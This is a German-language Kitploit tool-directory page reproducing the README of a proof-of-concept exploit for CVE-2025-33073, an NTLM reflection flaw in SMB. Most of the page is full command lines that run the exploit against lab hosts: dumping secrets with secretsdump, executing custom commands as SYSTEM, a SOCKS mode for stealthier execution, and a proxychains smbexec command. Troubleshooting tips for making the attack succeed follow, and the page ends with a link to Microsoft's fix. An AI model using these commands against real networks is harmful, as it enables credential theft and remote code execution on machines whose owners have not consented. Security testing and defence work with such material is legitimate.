Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-33073 — PoC-Exploit für den NTLM-Reflection-SMB-Fehler. | Kitploit
Tools/GitHubGitHub/starscow/cve-2025-33073
SchwachstellenanalyseExploitationLaterale BewegungPost-ExploitationPenetrationstestsRed Teaming
GitHubstarscow/cve-2025-33073

CVE-2025-33073

PoC-Exploit für den NTLM-Reflection-SMB-Fehler.

Repository anzeigen
1vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-33073

PoC-Exploit für den NTLM-Reflection-SMB-Fehler.

Alle Credits gehen an die offizielle Forschung:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Voraussetzungen

Betriebssystem: Kali Linux (hat die meisten Pakete vorinstalliert).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (im Repo enthalten)
  • xterm (nur für GUI)

Beispielverwendung

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
Tool herunterladen

image

Benutzerdefinierter Befehl
Anstatt secretsdump auszuführen, kann ein benutzerdefinierter Befehl ausgeführt werden.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
Für eine heimlichere Ausführung von Befehlen, nachdem eine gültige Verbindung als SYSTEM hergestellt wurde. --target und --target-ip sollten hier gleich sein.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image Außerdem kann ein benutzerdefinierter Befehl über proxychains ausgeführt werden, anstatt die SAM zu dumpen.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Manueller Exploit ohne DNS-Anforderung

Wenn du dich im selben Broadcast-Domain wie das Gerät befindest und es anfällig für LLMNR-Poisoning ist, ist es möglich, ein Gerät auszunutzen, ohne einen DNS-Eintrag registrieren zu müssen.

image

Fehlerbehebung

  • Ich habe gesehen, dass der Angriff manchmal nicht funktioniert, weil der Hostname für den Angriff verwendet wird, was zu einer DNS-Abfrage von Kali führt. Wenn Kali den DNS-Server nicht verwendet oder du eine '/ FAILED'-Meldung von impacket-ntlmrelayx erhältst, versuche, den Host zu deiner /etc/hosts-Datei hinzuzufügen. Dies sollte dazu führen, dass der Angriff funktioniert.
  • Wenn du die IP verwendest, sollte der Angriff funktionieren. Manchmal führt das mehrmalige Ausführen zu einem SUCCESS anstatt zu einem Fehlschlag. Es ist bis jetzt nicht ganz klar, warum das passiert. Ich denke, es hat etwas mit dem Netzwerk zu tun.
  • Versuche eine andere Coerce-Methode mit -M oder --method.

Wireshark

Lokale NTLM-Authentifizierung findet statt image

Lokale NTLM-Authentifizierung findet nicht statt, was zu einem FEHLGESCHLAGENEN Versuch führt image

Gut zu wissen

  • xterm ermöglicht Kopieren und Einfügen mit der mittleren Maustaste.
  • Der DNS-Eintrag sollte auch dem Client bekannt sein, das kann in manchen Fällen mehr Zeit in Anspruch nehmen. Mit mehr Zeit meine ich, gib ihm ein paar Minuten.
  • Dies ist nur ein PoC, was bedeutet, dass AV/EDR-Bypasses nicht versucht wurden zu umgehen. Verwendung auf eigene Gefahr.

So behebst du es

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073